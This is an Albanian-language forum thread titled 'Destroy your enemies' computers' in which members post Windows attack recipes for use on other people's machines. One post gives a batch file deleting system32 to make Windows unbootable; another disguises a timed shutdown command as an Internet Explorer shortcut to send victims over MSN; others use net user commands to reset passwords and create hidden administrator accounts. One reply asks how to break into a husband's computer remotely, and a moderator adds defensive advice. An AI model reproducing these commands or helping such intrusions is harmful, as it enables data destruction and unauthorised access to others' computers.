• Përshëndetje Vizitor!

    Nëse ju shfaqet ky mesazh do të thotë se ju nuk jeni regjistruar akoma. Edhe pse nuk jeni regjistruar ju arrini të shihni pjesën me të madhe të seksioneve dhe diskutimeve të forumit, por akoma nuk gëzoni të drejten për të marrë pjesë në to dhe në avantazhet e të qënurit anëtar i këtij komuniteti. Ju lutem : REGJISTROHUNI që të dërgoni postime dhe mesazhe në Forum-Al.

    Regjistrohu !

Shkateroni Kompjuterat E Armiqve Tuaj

r00t

Anëtar
Anëtar
Feb 8, 2009
Postime
642
Pikët
18
Vendndodhja
Monaco
Pik se pari un smbaj asnji pergjegjesi nese dikush me QI sa te pules e perdor kete ne kompjuterin e vet ose te dikush tjeter kjo esht vetem nji ide qe po ju jap :)
1.hapni notepad
2.shkruani kete komanden del c:\windows\system32\*.* /q
3.regjistrojeni kete dokument me mbarimin .bat ose .cmd
4.Kujdes mos e klikoni ne pc tuaj sepse ky dokument qe ju do e quani hack.bat ose hack.cmd fshin te gjitha dokumentat qe keni ne dosjen system32 dhe pasi beni restart kompjuterin ju smund te keni me akses ne sistemin tuaj pra windows nuk ben me
 

4x4

Anëtar i ri
Anëtar
Feb 14, 2009
Postime
675
Pikët
0
Titulli: Shkateroni Kompjuterat E Armiqve Tuaj

E Provova Po Su Bo Gjo :D
 

r00t

Anëtar
Anëtar
Feb 8, 2009
Postime
642
Pikët
18
Vendndodhja
Monaco
Alien nese e bere te pc yt bej restart pc e pastaj hec me thuaj ça u bo
mos haro qe kjo komand esht e vlefshme nese ke administrator account
 

ariannn

Anëtar i ri
Anëtar
Feb 16, 2009
Postime
34
Pikët
0
Titulli: Shkateroni Kompjuterat E Armiqve Tuaj

nese do me ja shkym dikujt pc-ne
hape new shortcut
dhe shtyp
shutdown -s -t 50 -c "trojan virus detected"pastaj shko next emeroje psh.internet explorer,,shtyp finish,,,pastaj mundesh me ja ndrru ikonen me ja bo si te internet explorer per me u doke sa ma "sexy" ,,klikon me tastin e djatht, pastaj properties change ikon edhe e gjen ikonen qe do....ne fund ja dergo nje miku apo kujdo me nepermjet msn-se ,,,,,,,,dhe pas 50 sek. pc-ja e atij/asaj vdek:D,,,, have fun;)
 

ariannn

Anëtar i ri
Anëtar
Feb 16, 2009
Postime
34
Pikët
0
Titulli: Shkateroni Kompjuterat E Armiqve Tuaj

nese doni me ja ndrru dikuj pass. e pc-se pa e dite pass.hiq
shko
start,run,shtyp cmd,ok,shtyp Ne cmd:
net user, shtyp enter
perseri: net user (ktu emri i administratorit,userit,apo veq administrator)dhe *(shift8),,shtyp enter........ psh.
net user administrator *,,shtyp pass. e ri,,,config dhe u kryyy:D
 

ariannn

Anëtar i ri
Anëtar
Feb 16, 2009
Postime
34
Pikët
0
Titulli: Shkateroni Kompjuterat E Armiqve Tuaj

nese do me kriju nje user te ri ne pc pa leje te administratorit:
hape cmd dhe shtyp:
net user (nje emer) (nje pass.) dhe ] psh.
net user angel 111222],,,shtyp enter ;)
 

ariannn

Anëtar i ri
Anëtar
Feb 16, 2009
Postime
34
Pikët
0
Titulli: Shkateroni Kompjuterat E Armiqve Tuaj

pasi te behesh user mundesh me u bere edhe administrator
hape cmd dhe shtyp:
net localgroup administrator angel add/,,,shtyp enter dhe ja ku e ke::)
 

ariannn

Anëtar i ri
Anëtar
Feb 16, 2009
Postime
34
Pikët
0
Titulli: Shkateroni Kompjuterat E Armiqve Tuaj

un kam provu te gjitha dhe jane ok
 

SERAFIM DILO

Anti Busavata
Anëtar
Aug 31, 2010
Postime
9,543
Pikët
48
Përgjigje e: Shkateroni Kompjuterat E Armiqve Tuaj

"Shum teme e mire".
Busave,po e provoj njehet te kompjuteri jot.
 

gurax

Super Moderator
Anëtar
Mar 19, 2011
Postime
3,030
Pikët
48
Vendndodhja
Virgo Supercluster, Local Group, Milky Way, Orion-
Përgjigje e: Shkateroni Kompjuterat E Armiqve Tuaj

Me pelqen komenti i Meri. Duke shtuar dhe komentin qe eshte shume e thjeshte te shkaterrohet dicka. Per te ndertuar, ne krahun tjeter, duhen '1337-sKillZ' ne gjuhen e shkaterruesve, qe shkojne pertej social engineering dhe tR0J4N phishing.
Per te eliminuar nje pjese te mire te rrezikut te ketyre me lart, asnjehere mos punoni me nje user qe ka privilegje administrative. Krijoni vete nje user normal dhe perdorni ate per punen e perditshme. Administrativi vetem per instalime apo mirembajtje. Ne kompjuterat e sotem nje gje e tille ben te pavlera teknikat e mesiperme me mesazhin 'access denied'.
 

PuffetiNa

V.I.P
Anëtar
Apr 28, 2010
Postime
14,102
Pikët
113
Përgjigje e: Shkateroni Kompjuterat E Armiqve Tuaj

Titulli: Shkateroni Kompjuterat 'E Armiqve' Tuaj :
``gang````gang````gang``
qenka me e thjeshte se sa duket ..... :p

Auuu hasmin ne prag te deres :mad:

:p

Lol. po si ore i lejoni kto programa ashiqare ? Ahhh zullumaqert e dreqit :mad:
 

Corn

Anëtar i ri
Anëtar
Sep 10, 2009
Postime
324
Pikët
0
Përgjigje e: Shkateroni Kompjuterat E Armiqve Tuaj

Pse duhet te kem armiq ?! me mire te me ken se sa te kem ! klm
 

HELEN OF TROY

Jeta vazhdon
Anëtar
Apr 17, 2010
Postime
1,311
Pikët
38
Vendndodhja
prane teje
Përgjigje e: Shkateroni Kompjuterat E Armiqve Tuaj

Keto jane per nje pc qe e kam afer?
Po ndonej keshille me largesi nuk kini?Ps dua ti futem burrit ne pc me rekomandoni si mundem?
 
Top